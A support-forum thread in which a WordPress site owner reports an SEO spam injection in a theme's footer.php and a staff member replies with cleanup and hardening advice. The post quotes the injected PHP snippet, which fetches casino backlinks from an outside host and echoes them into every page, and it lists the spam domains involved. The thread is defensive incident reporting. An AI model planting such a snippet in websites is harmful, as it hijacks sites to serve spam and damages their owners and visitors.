Support Center Visit Demo License manager Buy @ envato

Security incident with all my pages

44zero44zero
in Other

Hey guys,

A SEO spam injection was identified on our WordPress sites where we use BeTheme. One is only one month old, only plugin is WP-rocket.

Multiple live pages contained a hidden backlink block directly before the closing </body> tag. The injected links pointed to external spam domains, including:

jiaoyu.dianzishu.com

digitalgurukul.in

topsalesconsulting.com/cazadores

pmx.com.pk

isris.org

The visible anchor texts included casino-related terms such as:

BANDAR SLOT

SLOT THAILAND

The source was found in the active WordPress theme file footer.php. A malicious PHP snippet had been inserted directly before </body>:

$ch = curl_init('https://bibitgroup.org/api/backlink?domain=' . urlencode($_SERVER['HTTP_HOST']));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT, 3);

echo curl_exec($ch);

curl_close($ch);

This code dynamically fetched backlink content from bibitgroup.org and printed the response into the frontend HTML.

After removing the injected code and clearing the WordPress/WP Rocket cache, a follow-up live check showed that the known spam links were no longer present on the tested pages, including the homepage, /kontakt/, /arbeitsrecht/, /mietrecht/, and /impressum/.

A related SEO spam pattern was also observed on another page, including a suspicious AMP association in Google Search Console pointing to:

https://kcalculatorxbandarslot.vercel.app/

Any thoughts?


Best

Jannis

Comments

  • PhilPhil

    Hi,

    Thank you for providing such a detailed report and the specific code snippet found in your footer.php. This is a classic example of a "SEO Spam Injection" or "WordPress Backdoor," and the fact that it occurred on a site with minimal plugins (only WP Rocket) suggests a few possible entry points.

    The PHP snippet you found is designed to dynamically pull spam links from a remote server (bibitgroup.org), making it harder to detect via static scanners since the links themselves aren't stored in your database.

    Here are a few suggestions and steps you should take immediately to secure your environment:

    1. Check for the Entry Point: Since you only use WP Rocket, check if your version of BeTheme or WP Rocket is up to date. Vulnerabilities in outdated themes or plugins are the most common entry points. Also, ensure your WordPress Core is updated.
    2. Audit Your Server for Backdoors: Simply removing the code from footer.php might not be enough. Attackers often leave "backdoors" (hidden scripts) in other directories like wp-content/uploads or wp-includes to regain access later.
    3. Credential Reset (Crucial): If they were able to edit your footer.php, they likely had file system access or admin-level WP access.
      • Change all FTP/SFTP/Hosting Panel passwords.
      • Change all WordPress Admin passwords.
      • Update your Salt Keys in wp-config.php to force-logout all current sessions.
    4. File Permissions: Ensure your file permissions are hardened. Typically, 644 for files and 755 for folders. Consider temporarily setting footer.php to 444 (read-only) after cleaning it.
    5. Check for "Ghost" Admins: Go to Users -> All Users and check for any unauthorized accounts with Administrator privileges.
    6. Scan for Database Injections: Sometimes spam links are also injected into the wp_posts or wp_options tables.

    Best regards

    Learn more: Video Tutorials | How To | FAQ Vote on what comes next
Sign In or Register to comment.
This website uses cookies

We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services.

Neccessary

Necessary cookies help make a website usable by enabling basic functions like page navigation and access to secure areas of the website. The website cannot function properly without these cookies.

Analytics & Performance

Statistic cookies help website owners to understand how visitors interact with websites by collecting and reporting information anonymously.

Marketing

Marketing cookies are used to track visitors across websites. The intention is to display ads that are relevant and engaging for the individual user and thereby more valuable for publishers and third party advertisers.

Cookies are small text files that can be used by websites to make a user's experience more efficient.

The law states that we can store cookies on your device if they are strictly necessary for the operation of this site. For all other types of cookies we need your permission. This means that cookies which are categorized as necessary, are processed based on GDPR Art. 6 (1) (f). All other cookies, meaning those from the categories preferences and marketing, are processed based on GDPR Art. 6 (1) (a) GDPR.

This site uses different types of cookies. Some cookies are placed by third party services that appear on our pages.

You can at any time change or withdraw your consent from the Cookie Declaration on our website.

Learn more about who we are, how you can contact us and how we process personal data in our Privacy Policy.

Please state your consent ID and date when you contact us regarding your consent.